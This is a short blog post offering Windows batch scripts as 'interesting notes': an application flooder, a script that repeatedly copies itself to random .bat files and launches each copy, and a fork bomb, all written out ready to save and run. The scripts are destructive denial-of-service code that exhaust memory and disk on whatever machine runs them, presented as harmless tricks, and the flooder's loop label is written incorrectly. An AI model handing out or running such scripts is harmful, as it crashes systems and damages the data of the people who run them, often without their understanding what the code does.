Skip to main content

BATCH PROGRAMMING

Hey Friends in this blog i will share a few interesting batch programming notes just save the text  with the format of .bat


App Flooder :

@echo off
x //label
start winword //MS word
start mspaint //paint
start notepad
start write //wordpad
start cmd //cmd prompt
start explorer
start control //panel
start calc //calculator
goto x //infinite loop

Over  Loading  Memory  :

@echo off
:A
SET /A x=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A


Fork Bomb :

:s
start %0
goto s





Comments

Popular posts from this blog

Windows 7 Tricks

           Hey There Every one In these blog I want to share a few essential tricks for Windows 7. How To Hide Any Drive in Windows Most of you must have wondered if there exists a way without using software to Hide A Drive completely so that it cannot be viewed or accessed without unlocking it. so, here is a easiest method to hide drive simple 4 steps. Follow The Steps To Do This..  Step  1 : Go to run type “gpedit.msc” (without quotes) Step  2 : Select user configuration —> administrative templates —> windows components —> windows explorer(click on it)  Step  3 : On right panel search for hide theses specified drives in my computer. Step  4 : Double click it mark on enable to hide the drive and select drive the which you want to hide. If u want to hide all the drives which are on your system then select restrict all drives. to make it unhidden mark on disable option.. I hope this t...

About XeuTek

                                                                                                                      Click me XeuTek channel teaches you a range to techniques related to technology step by step over my shoulder.. I have a range of tutorials covering topics likes Hacking , top Hacks , cracking , phishing & more! If you like our videos subscribe to our channel stay tune with us.